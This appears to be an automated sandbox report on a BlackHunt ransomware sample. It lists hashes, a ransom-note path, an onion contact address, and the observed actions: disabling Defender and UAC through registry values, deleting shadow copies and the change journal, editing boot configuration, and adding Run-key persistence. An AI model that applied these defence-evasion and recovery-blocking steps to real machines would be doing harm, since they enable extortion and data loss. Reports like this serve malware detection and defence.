Analysis
-
max time kernel
134s -
max time network
62s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:35
Static task
static1
Behavioral task
behavioral1
Sample
b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe
Resource
win10v2004-20231215-en
General
-
Target
b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe
-
Size
707KB
-
MD5
2da6b0f9fce508df903d3e2d9f155197
-
SHA1
bdc74e3776903d3709d6038a2d6b1fd2351ecb31
-
SHA256
b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f
-
SHA512
c12aedc10a159a62ff86e520adaa64daf11e8a568519a2fedee46caa7e1babfb3074ffad4b6704046513a3aede5d3961c691b35f9918882ecba939467256ea47
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1e84vnh:6uaTmkZJ+naie5OTamgEoKxLWlGh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2612 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2600 bcdedit.exe 1716 bcdedit.exe -
Renames multiple (1958) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2608 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\O: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\N: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\B: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\M: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\W: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\E: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\R: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\T: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\V: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\Z: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\Q: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\G: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\X: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\J: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\L: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\K: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\I: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\S: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\H: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\P: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened (read-only) \??\A: b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\hu.txt b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ko.properties b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\#BlackHunt_Private.key b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtobe b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground_PAL.wmv b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Johannesburg b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\#BlackHunt_ReadMe.hta b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\#BlackHunt_Private.key b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\scenesscroll.png b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cancun b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#BlackHunt_ReadMe.hta b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_ReadMe.txt b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#BlackHunt_ReadMe.hta b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\#BlackHunt_Private.key b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\classlist b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guyana b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\#BlackHunt_Private.key b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\background.png b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chuuk b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_SelectionSubpicture.png b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#BlackHunt_ReadMe.hta b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_ja.jar b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#BlackHunt_Private.key b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720_480shadow.png b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToScenesBackground.wmv b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-annotations-common.jar b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\#BlackHunt_Private.key b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\VideoLAN\VLC\#BlackHunt_Private.key b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\Java\jre7\lib\zi\#BlackHunt_ReadMe.txt b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#BlackHunt_ReadMe.hta b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha1.png b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\VideoLAN\#BlackHunt_Private.key b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\rollinghills.png b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\Java\jre7\#BlackHunt_ReadMe.txt b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMainMask.wmv b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\#BlackHunt_ReadMe.txt b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1960 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2556 vssadmin.exe 2852 vssadmin.exe 1804 vssadmin.exe 1628 vssadmin.exe 1716 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe Token: SeRestorePrivilege 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe Token: SeBackupPrivilege 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe Token: SeTakeOwnershipPrivilege 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe Token: SeAuditPrivilege 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe Token: SeSecurityPrivilege 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe Token: SeIncBasePriorityPrivilege 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe Token: SeBackupPrivilege 1912 vssvc.exe Token: SeRestorePrivilege 1912 vssvc.exe Token: SeAuditPrivilege 1912 vssvc.exe Token: SeBackupPrivilege 2604 wbengine.exe Token: SeRestorePrivilege 2604 wbengine.exe Token: SeSecurityPrivilege 2604 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2688 wrote to memory of 2804 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 31 PID 2688 wrote to memory of 2804 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 31 PID 2688 wrote to memory of 2804 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 31 PID 2688 wrote to memory of 2804 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 31 PID 2688 wrote to memory of 2808 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 33 PID 2688 wrote to memory of 2808 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 33 PID 2688 wrote to memory of 2808 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 33 PID 2688 wrote to memory of 2808 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 33 PID 2688 wrote to memory of 2568 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 40 PID 2688 wrote to memory of 2568 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 40 PID 2688 wrote to memory of 2568 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 40 PID 2688 wrote to memory of 2568 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 40 PID 2804 wrote to memory of 2720 2804 cmd.exe 39 PID 2804 wrote to memory of 2720 2804 cmd.exe 39 PID 2804 wrote to memory of 2720 2804 cmd.exe 39 PID 2688 wrote to memory of 2640 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 36 PID 2688 wrote to memory of 2640 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 36 PID 2688 wrote to memory of 2640 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 36 PID 2688 wrote to memory of 2640 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 36 PID 2808 wrote to memory of 2676 2808 cmd.exe 35 PID 2808 wrote to memory of 2676 2808 cmd.exe 35 PID 2808 wrote to memory of 2676 2808 cmd.exe 35 PID 2688 wrote to memory of 2796 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 37 PID 2688 wrote to memory of 2796 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 37 PID 2688 wrote to memory of 2796 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 37 PID 2688 wrote to memory of 2796 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 37 PID 2688 wrote to memory of 2596 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 41 PID 2688 wrote to memory of 2596 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 41 PID 2688 wrote to memory of 2596 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 41 PID 2688 wrote to memory of 2596 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 41 PID 2688 wrote to memory of 2560 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 44 PID 2688 wrote to memory of 2560 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 44 PID 2688 wrote to memory of 2560 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 44 PID 2688 wrote to memory of 2560 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 44 PID 2688 wrote to memory of 2616 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 114 PID 2688 wrote to memory of 2616 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 114 PID 2688 wrote to memory of 2616 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 114 PID 2688 wrote to memory of 2616 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 114 PID 2568 wrote to memory of 2708 2568 cmd.exe 47 PID 2568 wrote to memory of 2708 2568 cmd.exe 47 PID 2568 wrote to memory of 2708 2568 cmd.exe 47 PID 2688 wrote to memory of 2992 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 46 PID 2688 wrote to memory of 2992 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 46 PID 2688 wrote to memory of 2992 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 46 PID 2688 wrote to memory of 2992 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 46 PID 2640 wrote to memory of 2988 2640 cmd.exe 48 PID 2640 wrote to memory of 2988 2640 cmd.exe 48 PID 2640 wrote to memory of 2988 2640 cmd.exe 48 PID 2688 wrote to memory of 2996 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 49 PID 2688 wrote to memory of 2996 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 49 PID 2688 wrote to memory of 2996 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 49 PID 2688 wrote to memory of 2996 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 49 PID 2688 wrote to memory of 1728 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 109 PID 2688 wrote to memory of 1728 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 109 PID 2688 wrote to memory of 1728 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 109 PID 2688 wrote to memory of 1728 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 109 PID 2688 wrote to memory of 1644 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 108 PID 2688 wrote to memory of 1644 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 108 PID 2688 wrote to memory of 1644 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 108 PID 2688 wrote to memory of 1644 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 108 PID 2688 wrote to memory of 484 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 104 PID 2688 wrote to memory of 484 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 104 PID 2688 wrote to memory of 484 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 104 PID 2688 wrote to memory of 484 2688 b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe 104 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe"C:\Users\Admin\AppData\Local\Temp\b23f60fc7a099e393b06616d1e7f323780394936d1b7d5b81a883332b90edc4f.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
